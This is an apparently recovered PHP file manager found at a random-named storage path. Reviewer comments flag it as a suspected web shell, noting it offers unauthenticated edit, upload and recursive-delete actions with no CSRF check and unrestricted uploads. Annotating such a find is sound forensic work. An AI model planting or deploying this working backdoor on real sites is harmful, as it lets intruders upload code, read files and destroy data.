/var/www/html/back/storage/app/public/131/0dtbkq/i5sx3.php
<?php
// file_manager.php - Simple File Manager with Back Button
// NOTE(review): the name in this header differs from the on-disk path recorded on the
// first line of this listing, which ends in a random-looking name under storage/app/public.
// The script offers read, edit, upload and delete over HTTP with no access check visible
// in this file. A copy found under an upload or storage path should be handled as a
// suspected web shell: preserve it, review web-server logs for requests to it, and
// establish how it was written there.
// A session is started here, but nothing in this file reads $_SESSION, so the session
// does not gate access to any action.
session_start();
// Turns off PHP error reporting for the whole request; failed file operations further
// down therefore produce no diagnostics.
error_reporting(0);
// ==================== CONFIGURATION ====================
// Canonical path of the directory that contains this script.
$base_dir = realpath(__DIR__);
// Every path check in this file confines access to $root_anchor, which is the PARENT of
// the script's directory, so sibling directories of the script are in reach too.
$root_anchor = dirname($base_dir);
// ==================== HELPER FUNCTIONS ====================
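/**
 * Reduce a request-supplied relative path to a conservative character set.
 *
 * Keeps only ASCII letters, digits, '.', '_', '-' and '/', removes every ".."
 * sequence, and trims leading and trailing slashes. This is a first filter only:
 * callers in this file still confine the result with safe_realpath_within().
 *
 * @param mixed $path Raw value taken from the request.
 * @return string Filtered relative path; '' when the input is not a scalar.
 */
function sanitize_path($path){
    // Request parameters can arrive as arrays (?dir[]=x); treat those as empty
    // instead of passing an array on to trim().
    if (!is_scalar($path)) {
        return '';
    }
    // Drop disallowed characters BEFORE removing "..". In the opposite order, a
    // character that is dropped here could leave two dots adjacent again after
    // the ".." removal had already run.
    $filtered = preg_replace('/[^a-zA-Z0-9\.\_\-\/]/', '', (string) $path);
    // A single pass is enough: any run of dots collapses to at most one dot.
    $filtered = str_replace('..', '', (string) $filtered);
    return trim($filtered, '/');
}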
/**
 * Canonicalise a path and accept it only if it lies inside an allowed root.
 *
 * realpath() resolves symlinks and dot segments, so the comparison is made on the
 * real location. The root is compared with a trailing separator so that a sibling
 * such as "/srv/app-old" does not pass as being inside "/srv/app".
 *
 * @param string $path         Path to check; it must exist for realpath() to succeed.
 * @param string $allowed_root Directory the result has to stay within.
 * @return string|false The canonical path, or false if it does not exist or is outside the root.
 */
function safe_realpath_within($path, $allowed_root){
    $resolved = realpath($path);
    if ($resolved === false) {
        return false;
    }

    $bare_root = rtrim($allowed_root, DIRECTORY_SEPARATOR);
    if ($resolved === $bare_root) {
        // The root itself is allowed.
        return $resolved;
    }

    $root_prefix = $bare_root . DIRECTORY_SEPARATOR;
    $is_inside = strncmp($resolved, $root_prefix, strlen($root_prefix)) === 0;

    return $is_inside ? $resolved : false;
}
/**
 * List the immediate children of a directory.
 *
 * Each entry is an array with the keys name, path, size, type and modified.
 * 'type' is 'directory' for directories and 'file' for everything else; 'size'
 * is 0 for anything that is not a regular file. '.' and '..' are skipped.
 *
 * @param string $dir Directory to read.
 * @return array List of entries; empty when $dir is not a directory.
 */
function get_file_list($dir){
    $listing = [];
    if (!is_dir($dir)) {
        return $listing;
    }

    foreach (scandir($dir) as $entry) {
        if (in_array($entry, ['.', '..'], true)) {
            continue;
        }

        $entry_path = $dir . DIRECTORY_SEPARATOR . $entry;
        $listing[] = [
            'name' => $entry,
            'path' => $entry_path,
            'size' => is_file($entry_path) ? filesize($entry_path) : 0,
            'type' => is_dir($entry_path) ? 'directory' : 'file',
            'modified' => date('Y-m-d H:i:s', filemtime($entry_path)),
        ];
    }

    return $listing;
}
/**
 * Format a byte count for display.
 *
 * Uses binary units (1 KB = 1024 bytes) with two decimals; values below 1024
 * are returned unscaled with the suffix " bytes".
 *
 * @param int|float $bytes Size in bytes.
 * @return string Human-readable size.
 */
function format_size($bytes) {
    // Largest unit first, so the first threshold reached decides the unit.
    $units = [
        1073741824 => ' GB',
        1048576 => ' MB',
        1024 => ' KB',
    ];

    foreach ($units as $threshold => $suffix) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    return $bytes . ' bytes';
}
// ==================== REQUESTED DIRECTORY HANDLING ====================
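// Resolve ?dir= (a path relative to $root_anchor) to an existing directory.
// Without the parameter, the script's own directory is shown. A non-string value
// (?dir[]=x) is treated as absent.
$requested_dir = (isset($_GET['dir']) && is_string($_GET['dir']))
    ? sanitize_path($_GET['dir'])
    : basename($base_dir);
// Compare with '' explicitly: a truthiness test would treat a directory named "0"
// as "no directory" and list the root under the wrong name.
$current_dir_candidate = $root_anchor . ($requested_dir !== '' ? DIRECTORY_SEPARATOR . $requested_dir : '');
$current_dir = safe_realpath_within($current_dir_candidate, $root_anchor);
// Fall back when the path is missing, outside the root, or names a regular file
// (a file is not a usable "current directory" for the actions below).
if ($current_dir === false || !is_dir($current_dir)) {
    // First fallback: the directory that holds this script.
    $requested_dir = basename($base_dir);
    $current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor);
    if ($current_dir === false) {
        // Last resort: the root anchor itself, addressed by the empty relative path.
        $requested_dir = '';
        $current_dir = safe_realpath_within($root_anchor, $root_anchor);
    }
}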
// ==================== PARENT DIRECTORY CALCULATION ====================
// Relative path the "Back" button links to. dirname() returns '.' for a
// single-segment path (and may return '\' on Windows); both mean "the root",
// which this script addresses with the empty string.
$parent_dir = ($requested_dir !== '') ? dirname($requested_dir) : '';
if ($parent_dir === '.' || $parent_dir === '\\') {
    $parent_dir = '';
}
// ==================== BREADCRUMB ====================
// Breadcrumb trail: one ['name' => segment, 'path' => cumulative relative path]
// entry per non-empty segment of $requested_dir.
$dir_parts = [];
if ($requested_dir !== '') {
    $trail = [];
    foreach (explode('/', $requested_dir) as $segment) {
        if ($segment === '') {
            continue;
        }
        $trail[] = $segment;
        $dir_parts[] = ['name' => $segment, 'path' => implode('/', $trail)];
    }
}
// ==================== ACTION HANDLING ====================
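// Dispatch on ?action=. Any unknown value, including the default 'list', falls
// through to the HTML listing below.
//
// NOTE(review): every action here is reachable by any client that can request this
// script. No login or session check is visible in this file, and no anti-CSRF token
// is verified, so edit, upload, create_folder and delete can also be triggered
// cross-site; 'delete' changes state on a plain GET. Restrict access (authentication,
// network allow-list) before exposing this file.
$action = $_GET['action'] ?? 'list';
// A non-string ?file= (e.g. file[]=x) is treated as absent.
$file_param = (isset($_GET['file']) && is_string($_GET['file'])) ? $_GET['file'] : '';
switch ($action) {
    case 'view':
        $file = sanitize_path($file_param);
        $file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
        // Operate on the canonical path that was actually checked, not on the raw one.
        $resolved = ($file !== '') ? safe_realpath_within($file_path, $root_anchor) : false;
        if ($resolved !== false && is_file($resolved)) {
            header('Content-Type: text/plain');
            // Keep browsers from re-interpreting the raw file content as another type.
            header('X-Content-Type-Options: nosniff');
            readfile($resolved);
            exit;
        }
        break;

    case 'edit':
        $file = sanitize_path($file_param);
        $file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
        $resolved = ($file !== '') ? safe_realpath_within($file_path, $root_anchor) : false;
        $editable = $resolved !== false && is_file($resolved);
        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            // Only existing files are overwritten; this action never creates a file.
            $content = $_POST['content'] ?? '';
            if ($editable) {
                file_put_contents($resolved, $content);
            }
            header('Location: ?action=list&dir=' . urlencode($requested_dir));
            exit;
        }
        if ($editable) {
            // ENT_SUBSTITUTE: without it htmlspecialchars() returns '' for content that is
            // not valid UTF-8, and saving the empty form would then truncate the file.
            $content = htmlspecialchars(file_get_contents($resolved), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            echo "<!DOCTYPE html><html><head><meta charset='utf-8'><title>Edit: ".htmlspecialchars($file)."</title></head><body>";
            echo "<h2>✏️ Edit: ".htmlspecialchars($file)."</h2>";
            echo "<form method='post'>";
            echo "<textarea name='content' style='width:100%;height:400px;font-family:monospace;'>$content</textarea><br><br>";
            echo "<button type='submit'>💾 Save</button> ";
            echo "<a href='?action=list&dir=".urlencode($requested_dir)."'>🚫 Cancel</a>";
            echo "</form></body></html>";
            exit;
        }
        break;

    case 'delete':
        $file = sanitize_path($file_param);
        $file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
        // Require a name: with an empty one, $file_path is the current directory
        // itself and the recursive branch would remove everything in it.
        if ($file !== '' && safe_realpath_within($file_path, $root_anchor) && file_exists($file_path)) {
            if (is_dir($file_path) && !is_link($file_path)) {
                $it = new RecursiveIteratorIterator(
                    new RecursiveDirectoryIterator($file_path, RecursiveDirectoryIterator::SKIP_DOTS),
                    RecursiveIteratorIterator::CHILD_FIRST
                );
                foreach ($it as $f) {
                    // Remove the entry itself, never its symlink target: isDir() and
                    // getRealPath() both follow links, which could reach outside the
                    // tree being deleted.
                    if ($f->isDir() && !$f->isLink()) {
                        rmdir($f->getPathname());
                    } else {
                        unlink($f->getPathname());
                    }
                }
                rmdir($file_path);
            } else {
                unlink($file_path);
            }
        }
        header('Location: ?action=list&dir=' . urlencode($requested_dir));
        exit;

    case 'upload':
        // NOTE(review): there is no allow-list for file type or size. Whatever is
        // uploaded is stored under its client-supplied base name inside a directory
        // below $root_anchor; if that directory is served by a PHP-enabled web server,
        // an uploaded script becomes executable. Restrict types or store uploads
        // outside the web root.
        if (!empty($_FILES['file'])) {
            $uploaded = $_FILES['file'];
            if ($uploaded['error'] === UPLOAD_ERR_OK) {
                // basename() drops any directory part of the client-supplied name.
                $name = basename($uploaded['name']);
                $dest = $current_dir . DIRECTORY_SEPARATOR . $name;
                if (safe_realpath_within(dirname($dest), $root_anchor)) {
                    // Adjust permissions only when the move actually succeeded.
                    if (move_uploaded_file($uploaded['tmp_name'], $dest)) {
                        @chmod($dest, 0644);
                    }
                }
            }
        }
        header('Location: ?action=list&dir=' . urlencode($requested_dir));
        exit;

    case 'download':
        $file = sanitize_path($file_param);
        $file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
        $resolved = ($file !== '') ? safe_realpath_within($file_path, $root_anchor) : false;
        if ($resolved !== false && is_file($resolved)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('X-Content-Type-Options: nosniff');
            // The name has passed sanitize_path(), so it cannot contain a quote or newline.
            header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
            header('Content-Length: '.filesize($resolved));
            readfile($resolved);
            exit;
        }
        break;

    case 'create_folder':
        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            $folder = sanitize_path($_POST['folder_name'] ?? '');
            // Explicit comparison so that a folder named "0" can be created.
            if ($folder !== '') {
                $fp = $current_dir . DIRECTORY_SEPARATOR . $folder;
                // The parent has to exist inside the root; the new folder must not exist yet.
                if (safe_realpath_within(dirname($fp), $root_anchor) && !file_exists($fp)) {
                    mkdir($fp, 0755, true);
                }
            }
        }
        header('Location: ?action=list&dir=' . urlencode($requested_dir));
        exit;
}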
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>📁 File Manager</title>
<style>
/* Global reset: no default margins or padding, border-box sizing everywhere. */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
/* Page background and base font. */
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
padding: 20px;
}
/* Centred white card that holds the whole interface. */
.container {
max-width: 1200px;
margin: 0 auto;
background: white;
border-radius: 15px;
box-shadow: 0 20px 40px rgba(0,0,0,0.1);
overflow: hidden;
}
/* Title bar. */
.header {
background: linear-gradient(135deg, #2c3e50, #34495e);
color: white;
padding: 25px;
text-align: center;
}
.header h1 {
font-size: 2.2em;
margin-bottom: 10px;
font-weight: 300;
}
/* Box that shows the resolved server-side path of the current directory. */
.current-path {
font-family: 'Courier New', monospace;
background: rgba(255,255,255,0.1);
padding: 10px;
border-radius: 8px;
margin: 15px 0;
word-break: break-all;
}
/* Toolbar strip below the header. */
.navigation {
background: #ecf0f1;
padding: 20px;
border-bottom: 1px solid #bdc3c7;
}
/* Buttons: base style, then colour variants (secondary, danger, success). */
.btn {
display: inline-flex;
align-items: center;
gap: 8px;
padding: 12px 20px;
background: #3498db;
color: white;
text-decoration: none;
border-radius: 8px;
font-weight: 500;
transition: all 0.3s ease;
border: none;
cursor: pointer;
font-size: 14px;
}
.btn:hover {
background: #2980b9;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(0,0,0,0.2);
}
.btn-secondary {
background: #95a5a6;
}
.btn-secondary:hover {
background: #7f8c8d;
}
.btn-danger {
background: #e74c3c;
}
.btn-danger:hover {
background: #c0392b;
}
.btn-success {
background: #27ae60;
}
.btn-success:hover {
background: #219a52;
}
/* Row of navigation buttons and the upload / create-folder forms. */
.toolbar {
display: flex;
gap: 15px;
flex-wrap: wrap;
margin-bottom: 20px;
}
/* Breadcrumb trail. */
.breadcrumb {
background: #f8f9fa;
padding: 15px 25px;
border-bottom: 1px solid #dee2e6;
}
.breadcrumb a {
color: #3498db;
text-decoration: none;
}
.breadcrumb span {
color: #7f8c8d;
margin: 0 8px;
}
/* Directory listing table. */
.file-table {
width: 100%;
border-collapse: collapse;
}
.file-table th {
background: #34495e;
color: white;
padding: 15px;
text-align: left;
font-weight: 500;
}
.file-table td {
padding: 15px;
border-bottom: 1px solid #ecf0f1;
}
.file-table tr:hover {
background: #f8f9fa;
}
.file-icon {
width: 20px;
text-align: center;
margin-right: 10px;
}
/* Directory rows get their own tint; !important keeps it ahead of the generic row hover. */
.folder-row {
background: #f0f8ff;
}
.folder-row:hover {
background: #e3f2fd !important;
}
.action-buttons {
display: flex;
gap: 8px;
flex-wrap: wrap;
}
/* Placeholder shown when the directory has no entries. */
.empty-folder {
text-align: center;
padding: 60px 20px;
color: #7f8c8d;
}
.empty-folder i {
font-size: 3em;
margin-bottom: 20px;
display: block;
}
/* Inline forms in the toolbar. */
.upload-form, .folder-form {
display: flex;
gap: 10px;
align-items: center;
}
input[type="text"], input[type="file"] {
padding: 10px;
border: 1px solid #bdc3c7;
border-radius: 6px;
font-size: 14px;
}
input[type="text"] {
min-width: 200px;
}
/* Narrow screens: stack toolbar, forms and action buttons vertically. */
@media (max-width: 768px) {
.toolbar {
flex-direction: column;
}
.upload-form, .folder-form {
flex-direction: column;
align-items: stretch;
}
.action-buttons {
flex-direction: column;
}
.btn {
justify-content: center;
}
}
</style>
</head>
<body>
<!-- Page shell: header with the resolved directory, toolbar, then the breadcrumb trail -->
<div class="container">
<div class="header">
<h1>📁 File Manager</h1>
<!-- Shows the absolute server-side path of the current directory to whoever loads the page -->
<div class="current-path">
📍 <?= htmlspecialchars($current_dir) ?>
</div>
</div>
<div class="navigation">
<div class="toolbar">
<!-- Back Button -->
<a class="btn" href="?action=list&dir=<?= urlencode($parent_dir) ?>">
⬅️ Back
</a>
<!-- Home Button -->
<a class="btn btn-secondary" href="?action=list&dir=<?= urlencode(basename($base_dir)) ?>">
🏠 Project
</a>
<!-- Root Button -->
<a class="btn btn-secondary" href="?action=list&dir=">
📂 Root
</a>
<!-- NOTE(review): both forms below post without an anti-CSRF token, and the handlers in this file verify none -->
<!-- Upload Form -->
<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?= urlencode($requested_dir) ?>" class="upload-form">
<input type="file" name="file" required>
<button class="btn btn-success" type="submit">📤 Upload</button>
</form>
<!-- Create Folder Form -->
<form method="post" action="?action=create_folder&dir=<?= urlencode($requested_dir) ?>" class="folder-form">
<input type="text" name="folder_name" placeholder="New Folder Name" required>
<button class="btn btn-success" type="submit">📁 Create Folder</button>
</form>
</div>
</div>
<!-- Breadcrumb: one link per path segment, each carrying the cumulative relative path -->
<div class="breadcrumb">
<a href="?action=list&dir=">Root</a>
<?php foreach($dir_parts as $p): ?>
<span>›</span>
<a href="?action=list&dir=<?= urlencode($p['path']) ?>"><?= htmlspecialchars($p['name']) ?></a>
<?php endforeach; ?>
</div>
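<?php
// Render the entries of the resolved directory, or a placeholder when it is empty.
// File names come from the filesystem and may have been chosen by an uploader, so
// every name is escaped for the context it is written into: HTML text, URL query
// value, or JavaScript inside an HTML attribute.
$files = get_file_list($current_dir);
if(empty($files)):
?>
    <div class="empty-folder">
        <i>📭</i>
        <h3>This folder is empty</h3>
        <p>Upload files or create new folders to get started</p>
    </div>
<?php else: ?>
    <table class="file-table">
        <thead>
            <tr>
                <th>Name</th>
                <th>Type</th>
                <th>Size</th>
                <th>Modified</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
        <?php foreach($files as $f): ?>
            <tr class="<?= $f['type'] === 'directory' ? 'folder-row' : '' ?>">
                <td>
                    <span class="file-icon">
                        <?= $f['type'] === 'directory' ? '📁' : '📄' ?>
                    </span>
                    <?= htmlspecialchars($f['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') ?>
                </td>
                <td><?= $f['type'] ?></td>
                <td><?= $f['type'] === 'directory' ? '-' : format_size($f['size']) ?></td>
                <td><?= $f['modified'] ?></td>
                <td>
                    <div class="action-buttons">
                    <?php if($f['type'] === 'directory'):
                        // Relative path of the sub-directory, as expected by ?dir=.
                        $next_rel = ($requested_dir !== '' ? $requested_dir . '/' : '') . $f['name'];
                    ?>
                        <a class="btn" href="?action=list&dir=<?= urlencode($next_rel) ?>">
                            📂 Open
                        </a>
                    <?php else: ?>
                        <a class="btn" href="?action=edit&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>">
                            ✏️ Edit
                        </a>
                        <a class="btn btn-secondary" href="?action=download&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>">
                            📥 Download
                        </a>
                    <?php endif; ?>
                    <?php
                    // The prompt text sits inside JavaScript inside an HTML attribute. HTML
                    // escaping alone is not enough there: the browser decodes entities before
                    // the script runs, so a quote in a file name would end the string literal.
                    // JSON-encode for the script context first, then escape for the attribute.
                    $confirm_js = json_encode(
                        'Are you sure you want to delete ' . $f['name'] . '?',
                        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_PARTIAL_OUTPUT_ON_ERROR
                    );
                    ?>
                        <a class="btn btn-danger" href="?action=delete&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($requested_dir) ?>"
                           onclick="return confirm(<?= htmlspecialchars($confirm_js, ENT_QUOTES, 'UTF-8') ?>)">
                            🗑️ Delete
                        </a>
                    </div>
                </td>
            </tr>
        <?php endforeach; ?>
        </tbody>
    </table>
<?php endif; ?>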
</div>
<script>
// Client-side niceties only; nothing here is a security control.
document.addEventListener('DOMContentLoaded', () => {
    // Ask before following any link whose URL contains action=delete.
    // NOTE(review): the delete links in the table also carry an inline onclick
    // confirm, so a click prompts twice. The deletion itself is a plain GET that
    // the server accepts without this script.
    const askBeforeDelete = (event) => {
        if (!confirm('Are you sure you want to delete this item?')) {
            event.preventDefault();
        }
    };
    for (const link of document.querySelectorAll('a[href*="action=delete"]')) {
        link.addEventListener('click', askBeforeDelete);
    }

    // Nudge a table row to the right while the pointer is over it.
    const nudgeRow = (event) => {
        const row = event.currentTarget;
        row.style.transform = 'translateX(5px)';
        row.style.transition = 'transform 0.2s ease';
    };
    const resetRow = (event) => {
        event.currentTarget.style.transform = 'translateX(0)';
    };
    for (const row of document.querySelectorAll('.file-table tr')) {
        row.addEventListener('mouseenter', nudgeRow);
        row.addEventListener('mouseleave', resetRow);
    }
});
</script>
</body>
</html>